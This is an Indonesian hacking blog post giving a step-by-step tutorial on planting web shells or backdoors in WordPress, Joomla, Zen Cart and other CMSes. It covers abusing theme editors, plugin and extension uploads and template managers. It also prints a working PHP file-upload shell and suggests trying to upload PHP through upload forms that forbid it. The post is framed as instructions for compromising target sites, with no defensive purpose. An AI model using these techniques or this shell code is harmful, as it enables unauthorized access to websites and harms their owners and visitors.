Posted by : Ham JavaNet Rabu, 13 Maret 2013

Bismillahirrahmanirrahim

Assalamualaikum bro 207 CS, apa kabarnya nih ?
Ini adalah lanjutan dari postingan kemarin nih :D

Tau gak sih backdoor itu apa ? yaa penjelasan singkatnya sih alat untuk menjelajahi website, menambah, mengurangi, mengedit file lewat pintu belakang atau secara diam diam wkkwkw kaya maling aja :)



Nah inti pada posting kali ini adalah kita akan membahas Bagaimana Cara Menanam Backdoor / Shell Di Berbagai Jenis CMS



Wordpress :

1. Theme-editor
Pergi ke appearance --> editor --> klik blabla.php --> ganti dengan script shell --> save --> pergi ke themes --> klik kanan pada theme yang dipake --> Open Image Location --> ganti /screenshot.png dgn blablabla.php tadi
[ex : www.sandy-x207.com/wp-content/themes/twentyten/single.php]

2. Upload plugin
Sisipkan shell pada folder plugin [ex : akismet] lalu masukan foldernya  ke zip
Pergi ke plugins --> add plugins --> upload
[akses shellnya di : www.sandy-x207.com/wp-content/plugins/lumaho/guataulumaho.php]
ket : lumaho itu nama folder, guataulumaho.php itu nama shell yang tadi sudah disisipkan

Joomla :

1. Install extention :
Pergi ke extentions --> Install / Uninstall --> Upload --> nanti ada bacaan error, cuekin aja
[akses : www.sandy-x207.com/tmp/shell.php]

2. Template manager :
Pergi ke extentions --> klik template manager --> pilih --> edit html -->
ganti dengan script shell --> save
[akses : alamatnya tertera disitu]

3. NinjaXplorer
 - Download plugins INI
 - Install lewat Extentions --> Install / Uninstall --> upload
 - Kalau sudah selesai, arahkan tab ke Components. Nah udah ke install kan Plugins yg tadi kita Upload, Selanjutnya masuk ke directory Plugins NinjaXplorer Tampilannya seperti ini :

- Setelah diupload, shell biasanya berada di http://www.target.com/news/backdoor.php atau http://www.target.com/backdoor.php

Zencart :

- Login ke page admin
- masuk ke file dimana kita bisa mengedit filefile [
http://site/path/admin/define_pages_editor.php]
- pilih plain text, dan pilih salah satu file yang mau kita edit dan masukkan script uploader atau shell kalian

<?phpecho '<b>Jundab<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data"
name="uploader" id="uploader">';echo '<input type="file" name="file" size="50">
<input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])){ echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>


- masuk ke file yang kalian pilih tadi melalui index.php  index.php?main_page=$file
- contoh jika kalian memilih contact_us maka masuk ke file tersebut sebagai berikut : index.php?main_page=contact_us
- Tidak semua zencart bisa di edit filenya, karna sudah diberikan perm .
Kalaupun bisa diedit, belom tentu juga bisa upload file, karna dir dari path website tersebut di .htaccess atau diberikan permission ;)

Cms lain :
1. Cari fitur upload
[walaupun dilarang upload .php tapi dicoba aja dulu, banyak kok web yang kaya gitu :D]
2. Tamper Data


Sekian tutorial dari saya [ Sandy-x207 ] . Maaf kalau sudah tau atau tutornya terlalu umum tapi itulah yang saya ketahui saat ini.

Wassalamualaikum Wr.Wb :D

Description: Cara Menanam Backdoor / Shell Di Berbagai Jenis CMS
Rating: 4.5
Reviewer: Ham JavaNet
ItemReviewed: Cara Menanam Backdoor / Shell Di Berbagai Jenis CMS

Leave a Reply

Monggo Tinggalkan Jejak Kaks :)

Subscribe to Posts | Subscribe to Comments

Welcome to My Blog

Popular Post

Labels

Arsip Blog

Followers

- Copyright © 2013 shad0w-share | Designed by Johanes Djogan -